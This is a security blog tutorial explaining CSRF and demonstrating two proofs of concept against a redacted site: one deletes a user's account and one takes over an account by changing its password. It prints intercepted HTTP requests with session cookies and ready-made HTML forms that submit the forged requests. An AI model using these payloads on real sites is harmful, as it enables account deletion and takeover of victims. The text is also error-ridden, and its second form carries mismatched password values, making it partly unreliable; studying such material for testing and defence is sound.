Greeting Everyone!
Today we are going to Look How to Exploit against CSRF Vulnerability, In this blog we Will Encounter How we are able to verify CSRF Issue Which cause Lead to delete Account, Takeover User Account, Changing personal Data of redected.com. We are going to see How different Process works To Bypass CSRF protection.
What is CSRF Vulnerability?
CSRF is Most Found vulnerability In Website which tricks the victim to do the malicious task on a victim authenticated web application his session itself. The level of the attack is based on privileges that the victim possessed. Because attacker will use the authentication that has gained in the current session to do the malicious task. CSRF attack will exploit the concept that if the user is authenticated all the requests that come from that user must be originated by the user. This attack Cause harm To user of web application such as Account takeover, privileges of user account etc.
There are two part that an attacker can supply Cross-Site Request Forgery (CSRF):
- That trick the victim into clicking a link or loading up a page. This is done through social engineering.
- The second part is cause through “forged” or made up request to the victim’s browser. This link will send a legitimate-looking request to the web application which done unwanted work without victim permission.
Example Of CSRF Attack:
- Changing CSRF Token
- Use Same CSRF Token
- Remove CSRF Token.
- Change Method POST to GET
- Replacing value of same length
- Extracting token via HTML injection
- Using only the static parts of the token
How to Reproduce of CSRF Attack:
Delete Users Account By CSRF: Here we are going to exploit CSRF Vulnerability due to Invalid CSRF Token when users deleting their Account which an attacker can easily delete User Account due to invalid CSRF Token.
Steps:
Visit https://redected.com Here Create Two Account For Testing Purpose -> Attacker Account -> Victim Account
Now Go To Attacker Account And navigate To https://redected.com/preferences here You can delete Your account .
Click On Delete My Account And Intercept Request using Burp Request:
- POST /account/delete HTTP/1.1
- Host: redected.com
- Connection: close
- Cookie:klksneo=eyJ1c2VyTmFtZSI6Im9mZmVuc2l2ZXRlc3RlcjAwMDBAZ21haWwuY29tIiwidXNlcklkIjoxNDcwNywidHJhY2VJZCI6IltvZmZlbnNpdmV0ZXN0ZXIwMDAwQGdtYWlsLmNvbV84MDdlYTY5My0xNDBhLTQ5ZGUtOTZhZi02OWEzZDI3MTE4OGFdIiwiZXhwaXJlIjoxNTk5MzM0NDU0LCJ2ZXJzaW9uIjoiMC45MC4wIn0=–sxU7lM2VZuhD86mwuonLBV3TXQLCyOgcL91xCNavzHA= Upgrade-Insecure-Request
As above Request we see there are no valid CSRF Token which mitigate against Security Risk,
Now Simply Create CSRF exploitation Link using Burp engagement tool,
<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”https://redected /account/delete” method=”POST”>
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Save It as CSRF.html
Navigate To Another Browser Login victim Account Send This CSRF Scrip to Victim Whenever Victim Will click Url Victim Will Loss his account Which Delete Successfully .
CSRF Which leads To Account takeover:
There is Possible to takeover any User account By CSRF which Lead to Change user account due To No CSRF Implement & There Is No Validation Of Current Password When user changing New password. That mean an attacker can perform CSRF Attack and attacker can change victim current password By attacker own.
How to Reproduce CSRF Attack:
Visit https://redected.com/ Create two account -> Attacker Account -> Victim Account
Now Go to attacker Account And navigate to https://redected.com/preferences where we can change Our password without Validating Current password.
Now Change Your Password And here intercept Request using Burp Request Looks :
POST /preferences HTTP/1.1
Host: redected.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 klssneo=eyJ1c2VyTmFtZSI6Im9mZmVuc2l2ZXRlc3RlcjAwMDBAZ21haWwuY29tIiwidXNlcklkIjoxNDcwNyLCJ2ZXJzaW9uIjoiMC45MC4wIn0=–iZjSrJ/ADBrFGDdQQFYgoSpuT3K03hvoWvWrASudB9Q= Upgrade-Insecure-Requests: 1 title=DR&first_name=&last_name=&company_name=&locale=en-US¤cy=USD&password=passwod&password_confirmation=password
There is No CSRF Token On Request As we see.
Now, Create CSRF Poc using Burp Engagement tool,
<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”https://redected.com/preferences” method=”POST”>
<input type=”hidden” name=”title” value=”DR” />
<input type=”hidden” name=”first_name” value=”” />
<input type=”hidden” name=”last_name” value=”” />
<input type=”hidden” name=”company_name” value=”” />
<input type=”hidden” name=”locale” value=”en-US” />
<input type=”hidden” name=”currency” value=”USD” />
<input type=”hidden” name=”password” value=”pasword@8133″ />
<input type=”hidden” name=”password_confirmation” value=”password @8133″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Save above Code As CSRF.html.
Now Login Victim Account On Browser2
The attacker will send a link to the page to the victim. When the victim is logged and clicks the link to the page, the password has change .
Thanks For Reading……. See You In Another Blog!
Stick With Our Blog: Click Here
Author
Pallab Jyoti Borah
VAPT Analyst